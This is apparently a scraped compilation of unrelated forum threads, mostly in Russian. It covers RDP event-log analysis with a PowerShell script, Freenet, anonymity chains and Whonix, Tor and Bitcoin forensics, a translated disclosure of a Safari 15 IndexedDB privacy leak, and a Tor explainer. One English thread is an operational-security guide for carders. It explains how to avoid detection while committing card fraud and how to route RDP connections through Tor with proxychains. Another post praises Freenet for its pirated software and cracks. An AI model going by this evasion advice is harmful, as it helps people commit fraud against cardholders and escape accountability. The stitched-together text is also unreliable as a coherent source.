Session Disconnect/Reconnect – события отключения / переподключения к сессии имеют разные коды в зависимости от того, что вызвало отключение пользователя (отключение по неактивности, выбор пункта Disconnect в сессии, завершение RDP сессии другим пользователем или администратором и т.д.). Эти события находятся в разделе журналов Applications and Services Logs -> Microsoft -> Windows -> TerminalServices-LocalSessionManager -> Operational. Рассмотрим RDP события, которые могут быть интересными:**

EventID – 24 (Remote Desktop Services: Session has been disconnected) – пользователь отключился от RDP сессии.
EventID – 25 (Remote Desktop Services: Session reconnection succeeded) – пользователь переподключился к своей имеющейся RDP сессии на сервере.
EventID – 39 (Session has been disconnected by session ) – пользователь сам отключился от своей RDP сессии, выбрав соответствующий пункт меню (а не просто закрыл окно RDP клиента). Если идентификаторы сессий разные, значит пользователя отключил другой пользователь (или администратор).

**EventID – 40 (Session has been disconnected, reason code ). Здесь нужно смотреть на код причины отключения в событии. Например:

reason code 0 (No additional information is available)– обычно говорит о том, что пользователь просто закрыл окно RDP клиента.

reason code 5 (The client’s connection was replaced by another connection) – пользователь переподключился к своей старой сессии.

reason code 11 (User activity has initiated the disconnect) – пользователь сам нажал на кнопку Disconnect в меню. **

Событие с EventID – 4778 в журнале Windows - > Security (A session was reconnected to a Window Station). Пользователь переподключился к RDP сессии (пользователю выдается новый LogonID).
Событие с EventID 4799 в журнале Windows -> Security (A session was disconnected from a Window Station). Отключение от RDP сеанса.
**Logoff: – выход пользователя из системы. При этом в журнале Applications and Services Logs - > Microsoft -> Windows -> TerminalServices-LocalSessionManager -> Operational фиксируется событие с EventID 23 (Remote Desktop Services: Session logoff succeeded)

при этом в журнале Security нужно смотреть событие EventID 4634 (An account was logged off).**
**Событие Event 9009 (The Desktop Window Manager has exited with code ( ) в журнале System говорит о том, что пользователь инициировал завершение RDP сессии, и окно и графический shell пользователя был завершен.
Ниже представлен небольшой PowerShell, который выгружает из журналов терминального RDS сервера историю всех RDP подключений за текущий день. В полученной таблице указано время подключения, IP адрес клиента и имя RDP пользователя (при необходимости вы можете включить в отчет другие типы входов).

Code:Copy to clipboard

Get-EventLog -LogName Security -after (Get-date -hour 0 -minute 0 -second 0)| ?{(4624,4778) -contains $_.EventID -and $_.Message -match 'logon type:\s+(10)\s'}| %{ (new-object -Type PSObject -Property @{ TimeGenerated = $_.TimeGenerated ClientIP = $_.Message -replace '(?smi).*Source Network Address:\s+([^\s]+)\s+.*','$1' UserName = $_.Message -replace '(?smi).*Account Name:\s+([^\s]+)\s+.*','$1' UserDomain = $_.Message -replace '(?smi).*Account Domain:\s+([^\s]+)\s+.*','$1' LogonType = $_.Message -replace '(?smi).*Logon Type:\s+([^\s]+)\s+.*','$1' }) } | sort TimeGenerated -Descending | Select TimeGenerated, ClientIP ` , @{N='Username';E={'{0}\{1}' -f $_.UserDomain,$_.UserName}} ` , @{N='LogType';E={ switch ($_.LogonType) { 2 {'Interactive - local logon'} 3 {'Network conection to shared folder)'} 4 {'Batch'} 5 {'Service'} 7 {'Unlock (after screensaver)'} 8 {'NetworkCleartext'} 9 {'NewCredentials (local impersonation process under existing connection)'} 10 {'RDP'} 11 {'CachedInteractive'} default {"LogType Not Recognised: $($_.LogonType)"} } }}

**

**Иногда бывает удобно с логами в таблице Excel, в этом случае вы можете выгрузить любой журнал Windows в текстовый файл и импортировать в Excel. Экспорт журнала можно выполнить из консоли Event Viewer (конечно, при условии что[логи не очищены](https://winitpro.ru/index.php/2017/07/31/ochistka- zhurnalov-sobytij-windows-s-pomoshhyu-powershell-i-wevtutil/)) или через командную строку:

Code:Copy to clipboard

WEVTUtil query-events Security > c:\ps\security_log.txt

Или так:

Code:Copy to clipboard

get-winevent -logname "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" | Export-Csv c:\ps\rdp-log.txt -Encoding UTF8

Список текущих RDP сессий на сервере можно вывести командой:

Code:Copy to clipboard

Qwinsta

Команда возвращает как идентификатор сессии (ID), имя пользователя (USERNAME)и состояние (Active/Disconnect). Эту команду удобна использовать, когда нужно определить ID RDP сессии пользователя при [теневом подключении](https://winitpro.ru/index.php/2014/02/12/rds-shadow-v- windows-2012-r2/).**

**Список запущенных процессов в конкретной RDP сессии (указывается ID сессии):

Code:Copy to clipboard

qprocess /id:157

На RDP-клиенте логи не такие информационные, основное чем часто пользуются информация об [истории RDP подключений](https://winitpro.ru/index.php/2013/05/13/ochistka-istorii-rdp- soedinenij/) в реестре.

[Источник](https://winitpro.ru/index.php/2018/09/25/analizing-rdp-logs- windows-terminal-rds/)**

FREENET АНОНИМНАЯ СЕТЬ!

ID: 676533bbb4103b69df371d67
Thread ID: 28168
Created: 2019-03-07T18:15:48+0000
Last Post: 2019-03-07T18:15:48+0000
Author: Dendi
Replies: 0 Views: 2K

Freenet — одноранговая сеть, предназначенная для децентрализованного распределённого хранения данных без возможности их цензуры, созданная с целью предоставить пользователям электронную свободу слова путём обеспечения их строгой анонимности.

Иду споры между использованием Freenet и Darknet , обе сети обеспечивают анонимность и у каждой из них есть свои плюсы и минусы...
С уверенностью скажу что Freenet более анонимен!

Плюсы/Минусы
[+] Более анонимный чем Даркнет
[+] Много пиратского софта и кряка
[+] С учетом полной анонимности невозможно отследить место нахождения юзера
[+] Любой файл загруженный в шифруется и разбивается на части
[+] Данная сеть полезна программистам и хакерам

[-] Более сложен в использовании
[-] Более медленный
[-] Отсутствие поисковых систем
[-] Многие сайты выглядят аскитично и напоминаю 90-е года когда интернет только зарождался
**
Может ли заменить интернет?**
Ответ: в близлежащее время нет, но если правительство будет продолжать контролировать полезные ресурсы то вполне возможно!

Помогите выстроить правильно процесс

ID: 676533bbb4103b69df371b44
Thread ID: 45118
Created: 2020-12-02T21:32:22+0000
Last Post: 2022-02-13T20:46:43+0000
Author: Octopus Team
Replies: 16 Views: 2K

Всем привет. Не так давно задался вопросом,а можно ли выстроить анонимную/безопастную цепочку по принципу : Android (wi fi) ----> Дедик(rdp или ssh) ----> ноутбук на базе Linux(rj45)

Android : Отключаем все ненужные внутренние "органы"(камеру,датчики разные и так далее)Получаем права суперпользователя,вырезаем оттуда весь софт гугла и прочей нечести. С F - Droid и прочих сайтов качаем нужный софт,настраиваем wi fi через vpn + tor(минус конечно что wi fi работает от симки) Пускаем так же весь трафик внутри Android через vpn + Tor

Ставим какой нибудь дедик

Linux : подготавливаем так же его к работе(нюансов к сожалению не знаю) Пускаем весь трафик через rj45

И что мы получим на выходе?

Ребят нужен совет в общем,как все это наладить!Тут полно умельцев,кто что подскажет?

Необходимость редактирования настроек Whonix-workstation?

ID: 676533bbb4103b69df371b51
Thread ID: 49758
Created: 2021-03-23T17:14:07+0000
Last Post: 2022-01-27T03:40:32+0000
Author: Kirigaya
Replies: 15 Views: 2K

Коллеги подскажите пожалуйста ответ на вопрос, реализуя цепочки vpn1 - whonix

vpn2, насколько важно изменять настройки в whonix workstation согласно гайду на официальном сайте whonix? В курсе paranoid написано, что можно просто подключаться используя openvpn без доп настроек whonix firewall и тд? Дак насколько же это важно и необходимо, используются ли они чтобы не допустить утечку tor ip адреса при отказе vpn или есть еще какие то подводные камни ? Интересно послушать ваше мнение.

P.S. Речь об этих настройках. => [https://www.whonix.org/wiki/Tunnels...ore_a_VPN#Inside_Whonix- Workstation_.E2.84.A2](https://www.whonix.org/wiki/Tunnels/Connecting_to_Tor_before_a_VPN#Inside_Whonix- Workstation_.E2.84.A2)

Виртуальные номера в телеграм

ID: 676533bbb4103b69df371b59
Thread ID: 41874
Created: 2020-09-08T13:00:47+0000
Last Post: 2022-01-21T16:55:36+0000
Author: negg
Replies: 9 Views: 2K

Существуют ли нормальные забугорные сервисы для вирт.номеров? И в чем заключается опасность привязки вирт номера

Электронная криминалистика на веб-сайтах Tor

ID: 676533bbb4103b69df371b5c
Thread ID: 61590
Created: 2022-01-18T14:00:21+0000
Last Post: 2022-01-18T14:14:27+0000
Author: 0x0021h
Prefix: Статья
Replies: 3 Views: 2K

1.Криминалистика VPN

(1) Сбор информации
Прежде чем получить доказательства удаленно, получите пароль администратора VPN-сервера от соответствующего персонала, войдите на сервер, проверьте онлайн-пользователей и немедленно измените пароль администратора, гарантируя, что доказательства действительны, чтобы предотвратить злонамеренное использование другим персоналом. уничтожение улик. Затем необходимо извлечь легко теряемые данные, такие как системное время, память, состояние сети, системный процесс, порт, элементы запуска, данные связи и т. д., и преобразовать их в файл изображения для криминалистической экспертизы памяти.

(2) Извлечение ключевых данных

После извлечения изменчивых данных также необходимо извлечь данные, связанные с VPN, развернутые на сервере VPS. После успешного развертывания программы VPN будут созданы файлы конфигурации, файлы журналов и т. д. Из этих файлов вы можете извлечь защищенный адрес VPN, информацию о конфигурации сертификата, информацию об аутентификации общего ключа, сегмент IP-адреса после подключения клиента, имя пользователя для аутентификации, пароль и пользователя, который в данный момент подключен к серверу с помощью VPN. .

2.криминалистика памяти

FTK Imager — это простой инструмент, специально используемый для создания файлов электронных улик, расчета хеш-значений и других функций.Кроме того, он поддерживает различные операционные системы и файловые системы, а также использует технологию поиска информации полнотекстового типа, так что персонал судебно-медицинской экспертизы можно быстро найти нужные электронные доказательства. Ниже приводится краткое описание процесса извлечения образа памяти:

(1) Запустите приложение FTK Imager;
(2) Щелкните файл, чтобы выбрать память захвата, появится всплывающее окно захвата памяти, и оно поддерживает настраиваемый путь сохранения и имя файла;
(3) Щелкните Capture Memory, чтобы получить текущий файл системной памяти с именем memdump.mem.

Извлечение важных данных памяти

Чтобы получить ключевые данные в файле памяти memdump.mem, вы можете выбрать инструмент просмотра шестнадцатеричных чисел, такой как HxD или Winhex, а затем использовать ключевое слово «лук» для поиска соответствующей информации о трассировке. Результаты поиска показаны на рисунке.

Анализ файла дампа памяти

Прежде чем программу можно будет запустить на компьютере, ее сначала необходимо загрузить в память, и криминалистическая экспертиза памяти становится очень важной, а это означает, что все программы или данные, которые создаются, проверяются или удаляются, будут сохранены в памяти. Сюда входят изображения, все действия в Интернете, ключи шифрования, сетевые подключения или фрагменты кода процессов. Во многих случаях такие свидетельства можно найти только в памяти.

Чтобы получить данные дампа памяти, можно выполнить экспертизу памяти с помощью Volatility, которая предоставляет множество команд для извлечения информации из памяти. Например, вы можете использовать volatility -f *.vmem plist для поиска подозрительных процессов, таких как VPN, браузеры TOR, биткойн-кошельки и т. д. Если он не найден в текущем процессе, вы можете использовать команду volatility -f *.vmem connscan, чтобы найти ранее разорванные и в настоящее время активные соединения, которые могут отображать текущую связь хоста, и вы можете использовать volatility -f *.vmem sockscan для подтверждения того, является ли входящее соединение для связи безопасным.

3.Экспертиза браузера TOR

Криминалистическая экспертиза локальных данных и криминалистическая экспертиза платформы онлайн-мониторинга. Информация о локальной памяти может использоваться для извлечения информации из реестра и информации о браузере в памяти. Время установки и время выполнения приложения можно узнать из информации локального реестра. Записи истории, записи загрузки, избранное и информацию формы можно извлечь из локального кеша, который можно использовать для восстановления событий.

4.запись истории

Записи истории – это следы просмотра пользователями. Анализируя записи истории, вы можете косвенно понять поведение пользователей при работе в Интернете. Записи истории сохраняются в файле places.sqlite, а файл places.sqlite можно открыть. с помощью инструмента базы данных. При просмотре веб-страницы URL-ссылка в адресной строке сохраняется в таблице moz_places, а конкретная информация показана на рисунке.

5.скачать запись

Запись загрузки браузера TOR сохранит адрес исходного веб-сайта, путь сохранения файла, размер файла и другую информацию о загруженном файле пользователя, которая в основном хранится в таблице moz_annos в файле places.sqlite.Конкретная информация показана на рисунке. .

6.Избранное

Избранное обычно представляет собой набор адресов, которые пользователи интересуют или часто посещают. Получение и анализ информации об избранном является ценной информацией. Эта часть важной информации в основном включает тип информации, заголовок страницы, ссылку и так далее. Данные избранного сохраняются в файле places.sqlite, используйте инструменты базы данных, чтобы открыть файл, а таблицы moz_bookmarks и moz_places сохраняют информацию об избранном. Конкретная информация показана на рисунке.

7.информация о форме

Информация формы обычно представляет собой информацию, которую пользователи вводят при просмотре веб-страницы. Ценные данные можно получить, проанализировав информацию формы, такую как номера счетов, адреса электронной почты и номера мобильных телефонов. Эта часть данных сохраняется в файле formhistory.sqlite.Открыв его с помощью инструмента базы данных, проверьте таблицу moz_formhistory.Важные поля включают имя формы, значение формы и другую информацию, как показано на рисунке.

Результаты судебно-медицинской экспертизы следующие:

8. Криминалистика цифровых валют

Цифровая валюта обладает характеристиками открытых и прозрачных данных, конфиденциальности и конфиденциальности личности, неподделки записей, неотказуемости транзакций, децентрализованной сети и распределенного консенсуса.
Основные доказательства включают в себя информацию журнала, информацию о кошельке, записи локального блока синхронизации и т. д.

Файл (Debug.log) можно найти непосредственно по пути установки кошелька Bitcoin Core.Из файла можно получить время каждой загрузки личного кошелька, количество адресных данных в кошельке и т.д.

После создания нового кошелька в каталоге кошелька Bitcoin Core будет создана папка с тем же именем, что и у кошелька, и в папке будет сохранен файл wallet.dat, в котором хранятся данные о транзакциях кошелька.

TX: данные транзакции;
destdata: данные биткойн-адреса (прямое хранение открытого текста);
purpose: данные биткойн-адреса (включая биткойн-адреса, удаленные после создания, сохраненные непосредственно в виде открытого текста).

Клиент биткойн-кошелька должен синхронизировать последние записи блоков при первом входе в систему и может анализировать все записи транзакций в локальном блоке синхронизации, что может обеспечить надежную поддержку сбора доказательств в автономной среде.

В процессе транзакции Биткойн сгенерированные файлы данных транзакции хранятся в: ../bitcoin/blocks (относительный путь).Важная информация показана на рисунке:

Результаты судебной экспертизы BTC показаны на рисунке:

Уязвимость Safari 15 может легко раскрыть вашу личность любому веб-сайту

ID: 676533bbb4103b69df371b5d
Thread ID: 61542
Created: 2022-01-17T19:12:25+0000
Last Post: 2022-01-17T19:12:25+0000
Author: pablo
Prefix: Статья
Replies: 0 Views: 2K

FingerprintJS не использует эту уязвимость в своих продуктах и не предоставляет сервисы межсайтового отслеживания. Мы боремся с мошенничеством и поддерживаем тенденцию полного устранения межсайтового отслеживания.
Мы верим, что уязвимости, подобные этой, должны открыто обсуждаться, чтобы помочь браузерам как можно быстрее устранить их, поэтому отправили баг-репорт мейнтейнерам WebKit, создали демонстрацию уязвимости и открыли репозиторий с её кодом.

Ниже обсудим баг, который появился в реализации API IndexedDB в Safari и позволяет любому веб-сайту отслеживать активность в интернете и даже раскрыть вашу личность. Упомянутую демонстрацию вы найдёте здесь.

Как и большинство современных браузерных технологий, IndexedDB следует [правилу](https://developer.mozilla.org/en-US/docs/Web/Security/Same- origin_policy) ограничения домена. Это правило — фундаментальный механизм защиты, ограничивающий взаимодействие документов и скриптов из одного источника с ресурсами из других источников. Происхождение ресурса определяется протоколом, именем хоста и портом сервера, который используется для доступа к нему.

Базы данных IndexedDB связываются с конкретным источником. При этом ассоциированные с различными источниками документы или скрипты не могут взаимодействовать с базой данных, которая связана с другими источниками. Если вы хотите больше узнать о работе API IndexedDB, обратитесь к документации MDN или к спецификации W3C.

Утечка IndexedDB в Safari 15

В Safari 15 на macOS, во всех браузерах iOS и iPadOS 15 API IndexedDB нарушает правило ограничения домена. Всякий раз, когда сайт взаимодействует с какой-то базой данных, в рамках одной сессии во всех активных вкладках, фреймах и окнах создаётся пустая копия базы данных с тем же именем.

Окна и вкладки часто делят одну и ту же сессию, если только вы не переключились на другой профиль, например в Chrome, или не открыли приватное окно. Вновь созданные базы данных далее будем называть базами данных с перекрёстным дублированием происхождения.

Чем опасна утечка?

Тот факт, что имена баз данных расходятся по различным источникам, — это, очевидно, нарушение приватности. Утечка позволяет произвольному веб-сайту узнать, какие сайты посещал пользователь, исходя из данных от других вкладок и окон.
Это возможно потому, что обычно база данных на сайте имеет уникальное имя. Более того, в некоторых случаях мы наблюдали, что в этих именах используются специфичные для пользователя идентификаторы. Это означает, что можно точно определить аутентифицированного пользователя.

Так происходит на YouTube, Google Calendar и Google Keep. Все эти сайты создают базы данных, которые в названии содержат идентификатор аутентифицированного пользователя Google. Если пользователь вошёл в несколько аккаунтов, такие базы данных создаются для всех аккаунтов.

Идентификатор Google генерируется самим Google и принадлежит единственному аккаунту. Он может использоваться API Google, чтобы получить открытую информацию о владельце аккаунта, а предоставленная этими API информация используется многими сервисами. В общем случае как минимум доступна фотография профиля пользователя. Чтобы узнать больше, обратитесь к [документации](https://developers.google.com/people/v1/how- tos/authorizing#profile-scopes) Google People API.

Всё это означает, что вредоносные сайты могут узнать личность пользователя, также это позволяет связать воедино несколько отдельных учётных записей конкретного человека.

Обратите внимание, что эти утечки не требуют от пользователя никаких конкретных действий. Вкладка или окно, работающие в фоновом режиме и постоянно опрашивающие API IndexedDB на предмет доступных баз, могут в реальном времени узнать, какие сайты посещает пользователь.

Click to expand...

Некий сайт может открыть другой веб-ресурс во фрейме (всплывающем окне), чтобы спровоцировать утечку информации о визитах на этот конкретный ресурс.

Как много сайтов затронуто?

Чтобы понять, как много сайтов используют IndexedDB, мы проверили домашнюю страницу Alexa Top 1000. Результаты показали, что более 30 сайтов работают с уязвимой базой прямо на домашней странице, где не нужно аутентификации или других действий пользователя.

Мы подозреваем, что в реальных сценариях это число значительно выше, поскольку сайты могут взаимодействовать с базами и на внутренних страницах после определённых действий пользователя, а также на страницах, доступных после аутентификации.

Иногда базы данных содержали UUID, созданные внутренними ресурсами, а именно рекламными сетями. Интересно, что загрузка таких ресурсов блокируется функцией предотвращения слежения в Safari. Эта блокировка эффективно предотвращает утечку имён баз данных. Также утечек не происходит, когда ресурсы заблокированы другими способами, например AdBlock или полным блокированием выполнения JavaScript.

Защищает ли приватный режим Safari от уязвимости?

Правило ограничения домена защищает, если следовать ему. Это надёжный механизм для окон во всех режимах. Сайты одного источника не должны иметь доступ к ресурсам другого происхождения, независимо от того, использует ли пользователь приватный режим, если это явно не разрешено через CORS.

В данном случае приватный режим Safari также затронут утечкой. Важно отметить, что сеансы просмотров в приватных окнах Safari ограничиваются одной вкладкой, что уменьшает объём утечки.

Но если вы посещаете несколько различных веб-сайтов в одной вкладке, то все базы данных, с которыми взаимодействуют эти сайты, передаются всем сайтам, которые посетит пользователь.

Обратите внимание: в других браузерах на базе WebKit, например в Brave или Google Chrome на iOS, приватные вкладки, как и неприватные, используют одну и ту же сессию браузера.

Click to expand...

28 ноября 2021 года мы сообщили об утечке в баг- трекер WebKit. Баг зарегистрирован под номером 233548.

Демонстрация

Простая страница демонстрирует, как веб-сайт может идентифицировать аккаунт посетителя. Она доступна по этой ссылке.

Запустив демо в уязвимом браузере, то увидите, что данные о контексте вашего браузера и о вашей личности сразу же станут доступны другому сайту. Идентификационные данные будут доступны, только если в том же сеансе вы авторизуйтесь с аккаунтом Google.

Демо представляет более 20 сайтов в других вкладках или окнах, включая Google Calendar, YouTube, Twitter и Bloomberg. Утечка на этих сайтах возможна потому, что имена баз данных на них достаточно специфичны, чтобы точно определить личность пользователя. Уязвимые браузеры — это Safari 15 на Mac OS и практически все браузеры на iOS и iPadOS. Apple Store требует, чтобы все они использовали WebKit.
Попробуйте демо.

Как воспроизвести утечку?

Чтобы воспроизвести утечку самостоятельно, вызовите функцию [IndexedDB.databases()](https://developer.mozilla.org/en- US/docs/Web/API/IDBFactory/databases). Когда сайт откроет другие фреймы, вкладки или окна для взаимодействия с другими базами, вы увидите их пустые дубликаты из других источников.
Согласно нашим наблюдениям, если база данных удалена, все связанные дубликаты также удаляются. Однако, видимо, проблема повторяется, когда открываются инструменты разработки или когда страница обновляется.

При каждом обновлении страницы базы дублируются снова, и, похоже, они независимы от исходных баз данных. Удалить их невозможно даже функцией [IndexedDB.deleteDatabases()](https://developer.mozilla.org/en- US/docs/Web/API/IDBFactory/deleteDatabase).

Как защитить себя?

К сожалению, пользователи мало что могут сделать, чтобы защититься, не прибегая к радикальным мерам. Один из вариантов — блокировать JavaScript по умолчанию и разрешать использовать его только на доверенных сайтах, но это сделает современный веб-сёрфинг неудобным и подходит не для всех.

Более того, уязвимости межсайтового скриптинга могут эксплуатироваться целенаправленно и через доверенные сайты, хотя здесь риск гораздо меньше. Альтернатива для пользователей Safari и Mac — временное переключение на другой браузер.

[Автор оригинала: Martin Bajanik ](https://fingerprintjs.com/blog/indexeddb- api-browser-vulnerability-safari-15/)
перевод @stranger777

Security and setting

ID: 676533bbb4103b69df371b60
Thread ID: 61009
Created: 2022-01-08T01:19:01+0000
Last Post: 2022-01-08T01:19:01+0000
Author: ThePandora
Prefix: Статья
Replies: 0 Views: 2K

Be focused on this primary and not risk for few bucks

WHAT I CANNOT RECOMMEND
- DO CARDING ON MOBILE
- PHYSICAL CARDING ON YOUR HOME ADRESS ( I AM NOT JOKE SOME PEOPLE DO IT )

WHAT IS IMPORTANT
- ENCRYPT HARD DISK
- USE KLEOPATRA PGP TO STORAGE SENSITIVE INFORMATION
- SECURED VPN LIKE IPVANISH,EXRESSVPN AND OTHER WHICH CARDERS CAN RECOMMEND

SECURITY TEST ( WHEN YOU USE SECURED VPN YOU DONT HAVE THIS PROBLEM,BUT CHECK IT AND BE SURE )

DNS LEAK ( YOU CAN LEAK YOUR REAL DNS )
WEBRTC ( YOUR HOME IP ADRESS CAN BE LEAKED )
IPV6 ( AGAIN YOU CAN LEAK IPV6 )
COOKIES CAN BE DANGEROUS SO NEVER LOG ON YOUR PERSONAL SOCIAL ACCOUNT ON YOUR LINUX ( USE BLEACHBIT )

USE TOR BROWSER AND DISABLED JAVASCRIPT
- WHEN YOU TRY FIND SOMETHING ILLEGAL,USE TOR AND BE SURE YOU RE SAFE ( WHEN YOU START BETTER BE PARANOID THAN END IN JAIL )

CONNECT TO RDP
- WRITE ON COMMAND "SUDO TOR"
- GET PROXYCHAINS "SUDO APT INSTALL PROXYCHAINS"
- GET RDP MANAGER FOR LINUX "SUDO APT INSTALL REMMINA"

AFTER YOU DO THIS "PROXYCHAINS REMMINA" ( YOUR CONNECT IS SECURE BECAUSE YOU GET OVER VPN AND OVER TOR )

SIMPLE BASIC,DONT DO CARDING ON YOUR BURNED LAPTOP,ITS CAN GO WRONG

Как на самом деле работает Tor? Полный визуальный гайд (2020)

ID: 676533bbb4103b69df371b62
Thread ID: 60907
Created: 2022-01-05T20:49:31+0000
Last Post: 2022-01-06T16:13:16+0000
Author: Artem N
Prefix: Статья
Replies: 2 Views: 2K

Сегодня мы подробно рассмотрим как на самом деле работает Tor.

Никаких упоминаний о том, как получить доступ к Tor, никаких упоминаний о том, что может быть в Tor.
Без спекуляций и без преувеличения того, чем является Tor. Просто подробное описание технических аспектов работы.

Статья предназначена для чтения любым человеком с НУЛЕВЫМИ знаниями о сетевых технологиях или Tor.

Давайте же погрузимся в тему.

Что такое Tor?

Военно-морская исследовательская лаборатория США разработала протокол Луковой маршрутизации (Tor) для того, чтобы обеспечить защиту коммуникаций американской разведки в Интернете. Как ни странно, Tor стал широко использоваться всеми - даже теми организациями, против которых борется США.

Вы можете представлять Tor как центр незаконной деятельности в Интернете, место, где можно купить любой наркотик, место для всего незаконного. Tor гораздо больше, нежели то, каким его представляют СМИ. Согласно данным Королевского колледжа, большая часть Tor является законной.

Когда вы посещаете веб-сайт, ваш компьютер устанавливает прямое TCP-соединение с сервером. Любой, кто осуществляет интернет-мониторинг, может прочитать этот TCP-пакет. Они так же могут узнать какой сайт вы посещаете и ваш IP-адрес. И к какому порту подключаетесь.

Если вы используете протокол HTTPS, то никто не узнает, что было в исходном сообщении. Но иногда противнику достаточно знать, с кем именно вы соединяетесь.

Используя Tor, ваш компьютер никогда не общается с сервером напрямую. Tor создает извилистый путь через 3 tor-узла и отправляет данные по этой схеме.

Основу Tor составляет луковая маршрутизация, которая представляет из себя анонимное и безопасное общение через публичную сеть. При луковой маршрутизации сообщения шифруются на нескольких уровнях.

"У лука есть слои" - Шрек

Click to expand...

Так же как и сообщение, проходящее через Tor. Каждый уровень в Tor - это шифрование, вы добавляете уровни шифрования к сообщению (в отличие от простого добавления одного уровня шифрования).

Вот почему он называется "Луковым протоколом маршрутизации" - он добавляет слои на каждом этапе.

Обзор

С помощью Tor пользователи могут сохранять анонимность в Интернете при посещении сайтов, ведении блогов, отправке мгновенных и почтовых сообщений, а также при работе с другими приложениями, использующими протокол TCP.

Click to expand...

Клиент выбирают путь через сеть и строят цепочку, где каждый узел на этом пути знает предшественника и приёмника, но не знает другие узлы в цепочке. Пути и цепи - это синонимы.

Исходный пользователь (знак вопроса слева) остаётся анонимным, если только вы не первый путь в узле, поскольку вы знаете, кто послал вам пакет.

Никто не знает какие данные отправляются пока они не достигнут последнего узла в пути; тот знает данные, но не знает кто их отправил. Предпоследний узел в пути не знает, что это за данные, знает только последний узел в пути.

Это привело к появлению угрозы, когда крупные организации с огромными ресурсами создают серверы Tor, цель которых - стать первым и последним луковым маршрутизатором. Если этой организации удастся это сделать, то она получают информацию о том кто отправил данные и какие именно это данные (фактически взламывая Tor).

О нет! Теперь крупная организация теперь знает, что вы смотрите Netflix.

Это невероятно сложно сделать, не находясь физически рядом с серверами, но мы рассмотрим это подробнее позже.

В этой статье я буду использовать Netflix в качестве обычного сервиса (Боб), а Amazon Prime Video в качестве противника (Ева). В реальности это крайне маловероятно. Я здесь не для того, чтобы рассуждать о том, какие организации могут захотеть атаковать Tor. Поэтому использую два маловероятных примера, чтобы не затрагивать политику.

Каждый пакет проходит по сети в ячейках фиксированного размера. Эти ячейки должны быть одинакового размера, чтобы данные, проходящие через сеть Tor, не выглядели подозрительно большими.

Эти ячейки на каждом маршрутизаторе разворачиваются с помощью симметричного ключа, после чего ячейка передается дальше по маршруту. Давайте рассмотрим сам Tor.

Tor

Сила в количестве

Click to expand...

Для обеспечения анонимности Tor необходимо большое количество пользователей. Если бы Tor был сложным в использовании, то новые пользователи не стали бы активно его использовать. Поскольку новые пользователи не пользуются Tor, то он становится менее анонимным. Исходя из этих рассуждений легко понять, что удобство использования - это не просто выбор дизайна, а требование безопасности чтобы сделать Tor более безопасным.

Если Tor не удобен в использовании или не имеет красивого дизайна, им не будет пользоваться много людей. Если им не пользуется много людей, то он менее анонимен.

Tor пришлось принять некоторые решения по дизайну, которые, возможно, не улучшают безопасность, но улучшают удобство использования в надежде, что улучшение удобства использования приведет к улучшению безопасности.

Чем Tor не является

Tor не является полностью децентрализованной одноранговой системой, как многие считают. Если бы он был полностью одноранговым, то он был бы не очень удобен в использовании. Tor требует серверов, которые управляют и хранят состояние сети в любой момент времени.

Tor не защищён от межсетевых атак. Атака end to end - это когда объект контролирует как первый, так и последний узел на пути, о чём говорилось ранее. Эту проблему эксперты по кибербезопасности ещё не решили.

Tor не скрывает личность отправителя.

В 2013 году в период выпускных экзаменов в Гарварде один из студентов пытался отсрочить экзамен, отправив ложное сообщение с угрозой взрыва. Студент использовал Tor и Guerrilla Mail (сервис, позволяющий людям создавать одноразовые адреса электронной почты), чтобы отправить угрозу школьному руководству.

Студента поймали, несмотря на то, что он принял меры предосторожности.

Gurillar Mail отправляет IP-адрес вместе с заголовком письма, чтобы получатель знал откуда пришло письмо. При использовании Tor студент ожидал, что IP-адрес будет скрыт, но власти знали, что он пришел с выходного Tor-узла. Поэтому они просто искали людей, которые имели доступ к Tor в здании университета во время, когда письмо было отправлено.

Tor - это не анонимизирующий сервис, но это сервис, который может шифровать весь трафик из пункта А в пункт Б (при условии, что end to end атака не будет произведена). Tor также невероятно медленный, поэтому использовать его для Netflix - не лучший вариант.

Различие между Tor и VPN

Когда вы используете VPN, он направляет весь ваш трафик в нужное место. При этом VPN шифрует трафик. Всё, что может видеть ваш интернет-провайдер - это зашифрованный трафик, идущий от вашего компьютера к VPN.

Он не сможет увидеть ваши пакеты. Он не знают с кем вы разговариваете - кроме VPN.

VPN не являются приватным в том же смысле, что и Tor. VPN защищают вас от интернет-провайдера или от злоумышленника (того, который следит за WiFi вашего ноутбука). Но он не защищает вас от самих себя.

VPN - это man in the middle. Они знают кто вы и с кем разговариваете. В зависимости от вида трафика, VPN также расшифровывает ваши пакеты. Это означает, что они знают всё. При использовании VPN вы должны доверять этому VPN. С Tor всё несколько иначе.

В Tor один мошеннический узел является неподконтрольным. Если один из узлов в вашем графе ранее был недоброжелательным, он будет знать только наш IP-адрес или ваш пакет данных. Tor защищает вас от Tor. VPN же ожидают, что вы им доверяете.

Tor защищает вас от сети Tor. Один мошеннический узел можно пережить. Они не ожидают, что вы будете доверять сети.

Никто кроме вас не должен знать IP-адреса отправителя и получателя. Никто не должен знать содержание сообщения.

Теперь, когда мы хорошо знаем что такое Tor, давайте рассмотрим луковую маршрутизацию.

Луковая маршрутизация

На примере приведённой выше сети мы смоделируем работу Tor. Ваш компьютер - тот, что крайний слева и вы отправляете запрос на просмотр Stranger Things на Netflix (потому что для чего еще используется Tor ). Этот путь узлов называется контуром. Позже мы рассмотрим как создаются цепи и как работает шифрование. Но пока попытаемся рассмотреть принцип работы Tor.

Начнём с сообщения (мы его еще не отправили). Нам нужно зашифровать сообщение N раз (где N - количество узлов в пути). Мы шифруем его с помощью AES, симметричной системы шифрования. Ключ согласовывается с помощью метода Диффи- Хеллмана. Не волнуйтесь, обсудим всё это позже. В пути 4 узла (минус ваш компьютер и Netflix), поэтому мы шифруем сообщение 4 раза.

Наш пакет ("Лук") имеет 4 слоя. Синий, фиолетовый, оранжевый и голубой. Каждый цвет представляет собой один слой шифрования.

Мы отправляем "луковицу" первому узлу на нашем пути. Затем этот узел удаляет первый слой шифрования.

Каждый узел в пути знает ключ дешифровки для своего слоя. Узел 1 удаляет голубой слой с помощью своего симметричного ключа (о котором они оба договорились).

Узел 1 знает, что вы отправили сообщение. Но оно всё ещё зашифровано 3 уровнями шифрования, и он не имеет представления о том, что это за сообщение.

По мере прохождения по пути всё больше и больше слоёв снимается. Следующий узел не знает, кто отправил пакет. Всё, что он знает - это то, что Узел 1 послал ему пакет, и он должен быть доставлен в Узел 3.

Теперь Узел 3 снимает слой.

